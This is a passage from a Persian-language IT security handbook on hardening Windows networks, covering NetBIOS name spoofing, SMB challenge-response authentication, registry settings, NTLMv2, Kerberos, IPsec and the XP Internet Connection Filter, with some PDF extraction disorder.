‫‪ NetBIOS‬ﺩﺍﺭﺍﻱ ﭘﺮﻭﺗﻜﻠﻬﺎﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻭ ﺗﺸﺨﻴﺺ ﻧﺎﻡ ﻣﻴﺰﺑﺎﻥ ﻣﺨﺼﻮﺹ ﺑﻪ ﺧﻮﺩ ﻣﻲﺑﺎﺷـﺪ‪ .‬ﺩﺭ ﺳـﺎﺩﻩﺗـﺮﻳﻦ ﻣـﺪﻝ‪ ،‬ﻣﻴﺰﺑﺎﻧﻬـﺎﻱ‬
‫)ﮔﺮﻩﻫـﺎﻱ( ‪ NetBIOS‬ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺑﺴﺘﻪﻫﺎﻱ ﻋﺎﻡﮔﺴﺘﺮ‪ ،‬ﻫﻤﺪﻳﮕﺮ ﺭﺍ ﭘﻴﺪﺍ ﻣﻲﻛﻨﻨﺪ ﻭ ﻧﺎﻡ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﺷﺒﻜﻪ ﺛﺒـﺖ ﻣـﻲﻧﻤﺎﻳﻨـﺪ‪ .‬ﺍﻳـﻦ ﺭﻭﺵ‬
‫ﻋﻼﻭﻩ ﺑﺮ ﻣﺸﻜﻞ ﻣﻘﻴﺎﺱﭘﺬﻳﺮﻱ ﺩﺭ ﺷﺒﻜﻪﻫﺎﻱ ﺑﺰﺭﮒ‪ ،‬ﻳﻚ ﻣﺸﻜﻞ ﻋﻤﺪﺓ ﺍﻣﻨﻴﺘﻲ ﻧﻴﺰ ﺩﺍﺭﺩ ﻭ ﺁﻥ ﺍﻳﻨﻜـﻪ ﺩﺭ ﺍﻳـﻦ ﺭﻭﺵ ﻫـﺮ ﮔـﺮﻩ ﺑﺮﺍﺣﺘـﻲ‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﻧﺎﻡ ﺛﺒﺖﺷﺪﻩ ﺭﺍ ﺑﺪﺯﺩﺩ ﻭ ﺧﻮﺩ ﺭﺍ ﺑﺠﺎﻱ ﺁﻥ ﺟﺎ ﺑﺰﻧﺪ‪.‬‬
‫‪٣٥٩‬‬
‫ﻳﻚ ﺣﺎﻟﺖ ﺍﻳﻤﻦﺗﺮ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﮔﺮﻩﻫﺎﻱ ‪ NetBIOS‬ﺑﻪ ﺻﻮﺭﺕ ﻧﻈﻴﺮ ﺑﻪ ﻧﻈﻴﺮ ﺑﺎ ﻣﻴﺰﺑﺎﻧﻬﺎﻳﻲ ﻛﻪ ﺑﻌﻨـﻮﺍﻥ ﮔـﺮﻩﻫـﺎﻱ ﺳـﺮﻭﻳﺲ ﻧـﺎﻡ‬
‫‪) NetBIOS‬ﮔﺎﻩ ﻣﻌﺮﻭﻑ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫـﺎﻱ ‪ (WINS‬ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪ ﺷﺪﻩﺍﻧﺪ ﺍﺭﺗﺒﺎﻁ ﺑﺮﻗﺮﺍﺭ ﻛﻨﻨﺪ ﻭ ﺟﻬﺖ ﺛﺒﺖ ﻧﺎﻡ ﻭ ﺟـﺴﺘﺠﻮ ﺑـﺮﺍﻱ ﻧﺎﻣﻬـﺎ‬
‫ﺁﻧﺎﻥ ﺭﺍ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﻫﻨﺪ‪ ،‬ﻭ ﺑﺮﺍﻱ ﭘﺨﺶ ﺑﺴﺘﻪﻫﺎ ﺩﺭ ﺳﻄﺢ ‪ NetBIOS‬ﺑﺎ ﮔﺮﻩﻫـﺎﻱ ﺗﻮﺯﻳـﻊ ‪ datagram‬ﺍﺭﺗﺒـﺎﻁ ﺑﺮﻗـﺮﺍﺭ ﻛﻨﻨـﺪ‪.‬‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻧﺎﻡ ‪ NetBIOS‬ﺩﺭ ﺑﺮﺍﺑﺮ ﮔﻤﺮﺍﻩﺳﺎﺯﻱ ﻧﺎﻣﻬﺎ ﺗﻮﺳﻂ ﻣﺎﺷﻴﻨﻬﺎ ﻣﺤﺎﻓﻈﺖ ﺑﻌﻤﻞ ﻣﻲﺁﻭﺭﺩ‪ .‬ﺑﻌﻼﻭﻩ ﻣﻘﺪﺍﺭ ﻛﻠﻴﺪ‬
‫‪\HKEY_LOCAL_MACHINE\CurrentControlSet\Services\Netbt\Parameters\NoNameReleaseOnD‬‬
‫‪emand‬‬
‫ﺩﺭ ‪ registry‬ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﺮﺍﺑﺮ ‪ ١‬ﮔﺬﺍﺷﺖ ﺗﺎ ﺍﺯ ﭘﺎﺳﺦ ﺩﺍﺩﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﺑﻪ ﺩﺭﺧﻮﺍﺳﺘﻬﺎﻱ ﺍﻋﻼﻡ ﻧﺎﻡ )ﻛﻪ ﺍﺣﺘﻤـﺎ ﹰ‬
‫ﻻ ﺍﺯ ﻃـﺮﻑ ﻳـﻚ ﻣﻬـﺎﺟﻢ‬
‫ﺑﺮﺍﻱ ﺑﺪﺳﺖ ﺁﻭﺭﺩﻥ ﻧﺎﻡ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻭ ﺟﺎ ﺯﺩﻥ ﺧﻮﺩﺵ ﺑﻪ ﺟﺎﻱ ﻭﻱ ﻓﺮﺳﺘﺎﺩﻩ ﺷﺪﻩ ﺍﺳﺖ( ﺟﻠﻮﮔﻴﺮﻱ ﺷﻮﺩ‪.‬‬
‫ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﻣﻮﺍﺭﺩ‪ ،‬ﻛﺎﺭﺑﺮﺍﻥ ﻣﺘﻘﺎﺿﻲ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﻣﻨﺒﻊ ﺑﺎﻳﺪ ﺍﺑﺘﺪﺍ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ SMB‬ﻛﻪ ﺁﻥ ﻣﻨﺒﻊ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ ﺩﺍﺭﺩ ﻭﺍﺭﺩ ﺷـﻮﻧﺪ‪.‬‬
‫ﺭﻭﻧﺪ ﻭﺭﻭﺩ ﺩﺭ ﻧﮕﺎﺭﺷﻬﺎﻱ ﺟﺪﻳﺪ ‪ SMB‬ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺑﻪ ﺭﻭﺵ ﭘﺮﺳـﺶ ﻭ ﭘﺎﺳـﺦ ﺻـﻮﺭﺕ ﻣـﻲﮔﻴـﺮﺩ‪ ٣٦٠.‬ﻭﻗﺘـﻲ ﻛـﺎﺭﺑﺮﻱ‬
‫ﺩﺭﺧﻮﺍﺳﺖ ﻭﺭﻭﺩ ﻣﻲﺩﻫﺪ‪ ،‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ SMB‬ﻳﻚ ﺭﺷﺘﺔ ﻣﺘﻨﻲ ﻳﻜﺘﺎ ﺑﻌﻨﻮﺍﻥ ﭘﺮﺳﺶ ﺑﺮﺍﻱ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﻣﻲﻓﺮﺳﺘﺪ‪ .‬ﺳﺮﻭﻳﺲﮔﻴﺮﻧـﺪﻩ‬
‫ﺍﻳﻦ ﺭﺷﺘﻪ ﺭﺍ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻛﻠﻴﺪ ﻧﺸﺴﺘﻲ ﻛﻪ ﺍﺯ ﺭﻭﻱ ﺩﺭﻫﻤﺮﻳﺨﺘﺔ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺭﻣﺰ ﻋﺒﻮﺭ ﻛﺎﺭﺑﺮ ﻣﺤﺎﺳﺒﻪ ﻣﻲﺷﻮﺩ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣـﻲﻛﻨـﺪ ﻭ ﺁﻧـﺮﺍ‬
‫ﺑﻌﻨﻮﺍﻥ ﭘﺎﺳﺦ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ SMB‬ﺑﺎﺯ ﻣﻲﮔﺮﺩﺍﻧﺪ‪ .‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ SMB‬ﻧﻴﺰ ﻫﻤﺎﻥ ﻋﻤﻠﻴﺎﺕ ﺭﺍ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﺪ ﻭ ﻧﺘﻴﺠﻪ ﺭﺍ ﺑـﺎ ﺟـﻮﺍﺏ‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﻣﻘﺎﻳﺴﻪ ﻣﻲﻛﻨﺪ‪ .‬ﺍﮔﺮ ﺍﻳﻨﺪﻭ ﻳﻜﺴﺎﻥ ﺑﺎﺷﻨﺪ‪ ،‬ﻫﻮﻳﺖ ﻛﺎﺭﺑﺮ ﺗﺼﺪﻳﻖ ﻣﻲﺷﻮﺩ‪ .‬ﺷﻜﻞ ﺩﻗﻴﻖ ﻣﺤﺎﺳﺒﺎﺕ ﺑﺴﺘﮕﻲ ﺑﻪ ﮔﻮﻳﺶ ﻣﻮﺭﺩ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪ SMB‬ﺩﺍﺭﺩ؛ ﻭ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺩﻭ ﮔﻮﻳﺶ ﺍﺻﻠﻲ )‪ LM‬ﻭ ‪ (NT‬ﺗﻌﺮﻳﻒ ﺷﺪﻩﺍﻧﺪ‪.‬‬
‫ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺍﻳﻦ ﺑﻪ ﻣﻌﻨﺎﻱ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪) SMB‬ﻳﺎ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺩﻳﮕﺮﻱ ﻛـﻪ ﺑـﺎ ﺁﻥ ﺩﺭ ﺍﺭﺗﺒـﺎﻁ ﺍﺳـﺖ(‬
‫ﺩﺭﻫﻤﺮﻳﺨﺘﺔ ﺭﻣﺰ ﻋﺒﻮﺭ ﻛﺎﺭﺑﺮﺍﻥ )ﻭﻟﻲ ﻧﻪ ﻣﺘﻦﺳﺎﺩﺓ ﺭﻣـﺰ ﻋﺒـﻮﺭ( ﺭﺍ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ ﺩﺍﺭﺩ‪ .‬ﺍﮔـﺮ ﺍﻳـﻦ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩ ﺑـﻪ ﺩﺳـﺖ ﻣﻬﺎﺟﻤـﺎﻥ ﺑﻴﺎﻓﺘـﺪ‪،‬‬
‫ﺩﺭﻫﻤﺮﻳﺨﺘﺔ ﺗﻤﺎﻡ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻛﺎﺭﺑﺮﺍﻥ ﺍﻓﺸﺎ ﻣﻲﺷﻮﺩ )ﻭ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻬﺎﺟﻢ ﺑﺘﻮﺍﻧﺪ ﺧﻮﺩ ﺭﺍ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺍﺯ ﻛﺎﺭﺑﺮﺍﻥ ﺟﺎ ﺑﺰﻧﺪ ﻭ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪SMB‬‬

‫ﻣﺘﺼﻞ ﮔﺮﺩﺩ(‪ .‬ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﺍﻳﻦ ﺭﻭﻳﻜﺮﺩ ﺩﺍﺭﺍﻱ ﺍﻳﻦ ﻣﺰﻳﺖ ﺍﺳﺖ ﻛﻪ ﺭﻣﺰ ﻋﺒﻮﺭ‪ ،‬ﭼﻪ ﺑﺼﻮﺭﺕ ﻣﺘﻦﺳﺎﺩﻩ ﻭ ﭼﻪ ﺑﺼﻮﺭﺕ ﺩﺭﻫﻤﺮﻳﺨﺘﻪ ﺍﺯ ﻫـﻴﭻ‬
‫ﻛﺠﺎﻱ ﺷﺒﻜﻪ ﻋﺒﻮﺭ ﻧﻤﻲﻛﻨﺪ‪ .‬ﺩﺭﻧﺘﻴﺠﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ‪ SMB‬ﺑﺎﻳﺪ ﻣﺜﻞ ﻛﻨﺘﺮﻟﮕﺮﻫﺎﻱ ﺩﺍﻣﻨﺔ ‪ Kerberos‬ﻣﻮﺭﺩ ﻣﺤﺎﻓﻈﺖ‬
‫ﻗﺮﺍﺭ ﮔﻴﺮﺩ‪.‬‬

‫‪357 Peer to Peer‬‬


‫‪358 Server Message Block‬‬
‫‪359 Name Service Nodes‬‬
‫‪ ۳۶۰‬ﻭﻳﺮﺍﻳﺸﻬﺎﻱ ﻗﺪﻳﻤﻲ ‪) SMB‬ﻣﺜﻞ ﻧﺴﺨﺔ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺩﺭ ‪ (Windows for Workgroups‬ﺍﺟﺎﺯﻩ ﻣﻲﺩﺍﺩﻧﺪ ﺭﻣﺰﻋﺒﻮﺭﻫﺎ ﺑﺼﻮﺭﺕ ﻣﺘﻦﺳﺎﺩﻩ ﺩﺭ ﺷﺒﻜﻪ ﻓﺮﺳﺘﺎﺩﻩ ﺷﻮﻧﺪ‪.‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٤٥٠‬‬

‫ﺍﮔﺮ ﺍﺯ ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻠﻬﺎﻱ ‪ Windows‬ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻲﻛﻨﻴﺪ‪ NetBIOS" ،‬ﺍﺯ ﻃﺮﻳﻖ ‪ "TCP/IP‬ﺭﺍ ﺩﺭ ﺗﻨﻈﻴﻤﺎﺕ ﭘﻴـﺸﺮﻓﺘﺔ ‪ TCP/IP‬ﻛـﺎﻣ ﹰ‬
‫ﻼ‬
‫ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ‪ .‬ﺍﮔﺮ ﺗﻤﺎﻡ ﻣﺎﺷﻴﻨﻬﺎﻱ ﺷﺒﻜﻪ ﺍﺯ ﻧﺴﺨﻪﻫﺎﻱ ﺟﺪﻳﺪﺗﺮ ﭘﺮﻭﺗﻜﻠﻬﺎﻱ ‪ NetBIOS/SMB‬ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﺑﺎﻳﺪ ﺁﻧﻬﺎ ﺭﺍ ﻃﻮﺭﻱ‬
‫ﺗﻨﻈﻴﻢ ﻛﻨﻴﺪ ﻛﻪ ﺗﻨﻬﺎ ﺑﻪ ﺩﺭﺧﻮﺍﺳﺘﻬﺎﻳﻲ ﭘﺎﺳﺦ ﺩﻫﻨﺪ ﻛﻪ ﺑﺮ ﺍﺳﺎﺱ ﺁﺧﺮﻳﻦ ﻭﻳﺮﺍﻳﺶ ﭘﺮﻭﺗﻜﻞ )ﺩﺭ ﺑﻴﺸﺘﺮ ﻣﻮﺍﺭﺩ ‪ (NTLMv2‬ﺁﻣﺪﻩﺍﻧﺪ ﺗﺎ ﺑﺪﻳﻨﺼﻮﺭﺕ‬
‫ﺟﻠﻮﻱ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﻣﻬﺎﺟﻤﺎﻥ ﺍﺯ ﻧﺴﺨﻪﻫﺎﻱ ﺁﺳﻴﺐﭘﺬﻳﺮ ﻗﺪﻳﻤﻲﺗﺮ ﮔﺮﻓﺘﻪ ﺷﻮﺩ‪ .‬ﺍﮔﺮ ﺑﺮﺍﻱ ﺍﺩﺍﺭﺓ ﺳﻴﺴﺘﻢ ﻓﺎﻳﻞ ﺭﺍﻫﺒﺮﻱ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﻣﻮﺭﺩ ﻧﻴـﺎﺯ‬
‫ﻧﻴﺴﺖ‪ ،‬ﺑﻪ ﻛﻠﻴﺪ‬
‫‪HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters\Auto‬‬
‫‪ShareWKS‬‬
‫ﺩﺭ ‪ registry‬ﻣﻘﺪﺍﺭ ‪ ٠‬ﺑﺪﻫﻴﺪ ﺗﺎ ﺁﻧﺮﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻛﺮﺩﻩ ﺑﺎﺷﻴﺪ‪.‬‬
‫‪ Windows‬ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﻃﻮﺭﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻛﺮﺩ ﻛﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍﻩ ﺩﻭﺭ ﻧﻪﺗﻨﻬﺎ ﺑﻪ ﻓﺎﻳﻠﻬﺎ ﺑﻠﻜﻪ ﺑﻪ ﻛﻠﻴﺪﻫﺎﻱ ‪ registry‬ﻧﻴﺰ ﺩﺳﺘﺮﺳـﻲ ﺩﺍﺷـﺘﻪ‬
‫ﺑﺎﺷﻨﺪ‪ .‬ﺍﻳﻦ ﻣﺠﻮﺯ ﺍﻣﻨﻴﺘﻲ ﺭﻭﻱ ﻛﻠﻴﺪ‬
‫‪HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurePipeServers\winreg‬‬

‫ﻗﺮﺍﺭ ﺩﺍﺭﺩ ﻭ ﺗﻌﻴﻴﻦ ﻣﻲﻛﻨﺪ ﻛﻪ ﻛﺪﺍﻡ ﻛﺎﺭﺑﺮﺍﻥ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ‪ registry‬ﺭﺍ ﺗﻐﻴﻴﺮ ﺩﻫﻨﺪ‪ .‬ﺍﮔﺮ ﻧﻴﺎﺯ ﺑﻪ ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺑﻪ ‪registry‬‬
‫ﺩﺍﺭﻳﺪ‪ ،‬ﺍﻳﻦ ﮔﺮﻭﻩ ﺑﺎﻳﺪ ﺗﻨﻬﺎ ﺷﺎﻣﻞ ﺭﺍﻫﺒﺮﺍﻥ ﺳﻴﺴﺘﻢ ﺑﺎﺷﺪ‪ ،‬ﻭ ﺩﺭ ﻏﻴﺮ ﺍﻳﻨﺼﻮﺭﺕ ﺑﺎﻳﺪ ﺷﺎﻣﻞ ﻫﻴﭽﻜﺲ ﻧﺒﺎﺷﺪ‪ .‬ﻫﻤﭽﻨـﻴﻦ ﻣـﻲﺗـﻮﺍﻥ ﺳـﺮﻭﻳﺲ‬
‫ﺩﺳﺘﺮﺳﻲ ﺭﺍﻩ ﺩﻭﺭ ﺑﻪ ‪ registry‬ﺭﺍ ﺑﺎﻟﻜﻞ ﻏﻴﺮﻓﻌﺎﻝ ﻛﺮﺩ‪.‬‬
‫ﺗﻨﻈﻴﻤﺎﺕ ﭘﻴﺸﺮﻓﺘﺔ ‪ TCP/IP‬ﺑﺮﺍﻱ ﻛﺎﺭﺗﻬﺎﻱ ﺷﺒﻜﻪ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ‪ Windows NT‬ﺩﺍﺭﺍﻱ ﻳﻚ ﺻﺎﻓﻲ ﺳﺎﺩﻩ ﺑﺮﺍﻱ ﺑـﺴﺘﻪﻫـﺎ‬
‫ﺍﺳﺖ ﻛﻪ ﺑﺮ ﺍﺳﺎﺱ ﭘﻮﺭﺕ ﻣﻘﺼﺪ ﺑﺴﺘﻪﻫﺎﻱ ‪ UDP‬ﻳﺎ ‪ TCP‬ﺑﻪ ﺁﻧﻬﺎ ﺍﺟﺎﺯﺓ ﻋﺒﻮﺭ ﻣﻲﺩﻫﺪ‪ ،‬ﻭ ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺴﺘﻪﻫﺎﻱ ﻏﻴـﺮ ‪ IP‬ﺭﺍ ﻧﻴـﺰ‬
‫ﻏﺮﺑﺎﻝ ﻛﻨﺪ‪.‬‬

‫ﺍﺯ ‪ Windows 2000‬ﺑﻪ ﺑﻌﺪ‬


‫ﺩﺍﻣﻨﻪﻫﺎﻱ ‪ Windows 2000‬ﻧﺴﺒﺖ ﺑﻪ ﻧﺴﺨﻪﻫﺎﻱ ﻗﺒﻞ ﺍﻣﻜﺎﻥ ﻛﻨﺘﺮﻝ ﺑﺴﻴﺎﺭ ﺑﻴﺸﺘﺮﻱ ﺭﻭﻱ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫـﺎﻱ ﻋـﻀﻮ ﺩﺍﻣﻨـﻪ ﺍﺭﺍﺋـﻪ‬
‫ﻼ ﻫﻨﮕﺎﻡ ﭘﻴﻮﺳﺘﻦ ﻳﻚ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﺑﻪ ﺩﺍﻣﻨﻪ‪ ،‬ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺩﺍﻣﻨﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻣﺤﻠﻲ ﺁﻥ ﺍﻳـﺴﺘﮕﺎﻩ‬ ‫ﻣﻲﺩﻫﻨﺪ‪ .‬ﻣﺜ ﹰ‬
‫ﻛﺎﺭﻱ ﺳﻮﺍﺭ ﺷﻮﺩ‪ ،‬ﻛﻪ ﺍﻳﻦ ﺍﻣﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﺍﺳﺘﺤﻜﺎﻡ ﺍﻣﻨﻴﺖ ﺍﻳﺴﺘﮕﺎﻫﻬﺎﻱ ﻛﺎﺭﻱ )ﺑﺼﻮﺭﺕ ﻣﺘﻤﺮﻛﺰ( ﻣﻔﻴﺪ ﺑﺎﺷﺪ‪.‬‬
‫‪ Windows 2000‬ﻭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﻌﺪ ﺍﺯ ﺁﻥ ﺍﺯ ‪ kerberos‬ﺑﻌﻨﻮﺍﻥ ﻻﻳﺔ ﺍﺻﻠﻲ ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﻫﺮﭼﻨـﺪ ﻫﻨـﻮﺯ ﻫـﻢ ﺍﺯ‬
‫ﻼ ﺩﺭ ﺍﻳﻦ ﻛﺘﺎﺏ ﮔﻔﺘﻪ ﺷـﺪ‬‫‪ NetBIOS‬ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲﻧﻤﺎﻳﻨﺪ ﻭ ﻟﺬﺍ ﺗﻮﺻﻴﻪﻫﺎﻱ ﻗﺒﻠﻲ ﺑﺎﺯ ﻫﻢ ﻛﺎﺭﺑﺮﺩ ﺩﺍﺭﻧﺪ‪ - kerberos .‬ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﻗﺒ ﹰ‬
‫‪ -‬ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻭ ﺗﺄﻳﻴﺪ ﺍﻋﺘﺒﺎﺭ ﺭﺍ ﺑﺼﻮﺭﺕ ﺍﻳﻤﻦ ﺑﺮﺍﻱ ﺧﺪﻣﺎﺕ ﺷﺒﻜﻪ ﻓﺮﺍﻫﻢ ﻣﻲﻛﻨـﺪ‪ .‬ﺩﺭ ‪ Windows 2000‬ﻛﻨﺘﺮﻟﮕـﺮ ﺍﺻـﻠﻲ ﺩﺍﻣﻨـﻪ‬
‫)‪ (primary domain controller‬ﻓﺮﻣﺎﻧﺪﻫﻲ ‪ kerberos‬ﺭﺍ ﻋﻬﺪﻩﺩﺍﺭ ﺍﺳﺖ‪.‬‬
‫‪ Windows 2000‬ﻫﻤﭽﻨﻴﻦ ﺍﺯ ‪ IPsec‬ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﺷﺒﻜﻪﻫﺎﻱ ﺧﺼﻮﺻﻲ ﻣﺠـﺎﺯﻱ )‪VPN‬ﻫـﺎ( ﭘـﺸﺘﻴﺒﺎﻧﻲ ﻣـﻲﻛﻨـﺪ‪ .‬ﺑـﺮﺍﻱ ﺍﺗـﺼﺎﻻﺕ‬
‫ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﻭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻣﻲﺗﻮﺍﻥ ‪ IPsec‬ﺭﺍ ﺍﻟﺰﺍﻣﻲ ﻧﻤﻮﺩ‪ .‬ﭘﻴﻜﺮﺑﻨﺪﻱ ‪ IPsec‬ﺩﺭ ﺑﺮﻧﺎﻣﺔ ﻣﺪﻳﺮﻳﺖ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ‪ IP‬ﺍﻧﺠـﺎﻡ‬
‫ﻣﻲﺷﻮﺩ‪ .‬ﻭﻳﺮﺍﻳﺸﻬﺎﻱ ﻗﺪﻳﻤﻲﺗﺮ ‪ Windows‬ﺍﺯ ﻳـﻚ ﭘﺮﻭﺗﻜـﻞ ﺧـﺎﺹ ﻣﺎﻳﻜﺮﻭﺳـﺎﻓﺖ )‪ (PPTP‬ﺑـﺮﺍﻱ ﺍﻳﺠـﺎﺩ ﺗﻮﻧﻠﻬـﺎﻱ ‪ VPN‬ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻣﻲﻛﺮﺩﻧﺪ‪ .‬ﺩﺭ ﺍﻛﺜﺮ ﻣﻮﺍﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪ IPsec‬ﺗﺮﺟﻴﺢ ﺩﺍﺭﺩ‪ ،‬ﻣﮕﺮ ﺍﻳﻨﻜﻪ ﺑﺨﻮﺍﻫﻴﺪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻗﺪﻳﻤﻲﺗﺮ ﺭﺍ ﻧﻴﺰ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻛﻨﻴﺪ‪.‬‬
‫‪ Windows XP‬ﻳﻚ ﺻﺎﻓﻲ ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﻭﺿـﻌﻴﺖ ﺑـﺴﺘﻪﻫـﺎ ﺑـﻪ ﻧـﺎﻡ ﻏﺮﺑـﺎﻝ ﺍﺗـﺼﺎﻝ ﺍﻳﻨﺘﺮﻧـﺖ )‪ ٣٦١(ICF‬ﻧﻴـﺰ ﺩﺭ ﺧـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﺑـﺮﺍﻱ‬
‫ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎﻱ ﺍﻳﻨﺘﺮﻧﺖ ﺍﻳﺪﻩﺁﻝ ﺍﺳﺖ‪ .‬ﺩﺭ ﺍﻳﻦ ﺻﺎﻓﻲ ﺑﻄﻮﺭ ﭘﻴﺶﻓﺮﺽ ﻓﻘﻂ ﺑﺴﺘﻪﻫﺎﻳﻲ ﺍﺟﺎﺯﺓ ﻋﺒﻮﺭ ﻣﻲﻳﺎﺑﻨﺪ ﻛﻪ ﻣﺮﺑﻮﻁ ﺑﻪ ﺍﺗـﺼﺎﻻﺗﻲ‬
‫ﺑﺎﺷﻨﺪ ﻛﻪ ﺗﻮﺳﻂ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﺁﻏﺎﺯ ﺷﺪﻩﺍﻧﺪ‪.‬‬

‫‪361 Internet Connection Filter‬‬


‫‪٤٥١‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﻣﺤﺎﻓﻈﺖ ﺍﺯ ﺣﺴﺎﺑﻬﺎﻱ ﮐﺎﺭﺑﺮﻱ‬


‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ‪ Windows‬ﺍﻣﺮﻭﺯﻱ ﺑﺮﺍﻱ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺍﺯ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻃﻮﻻﻧﻲ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲﻛﻨﻨﺪ‪ .‬ﻛـﺎﺭﺑﺮﺍﻥ ﺧـﻮﺩ ﺭﺍ ﺑـﻪ‬
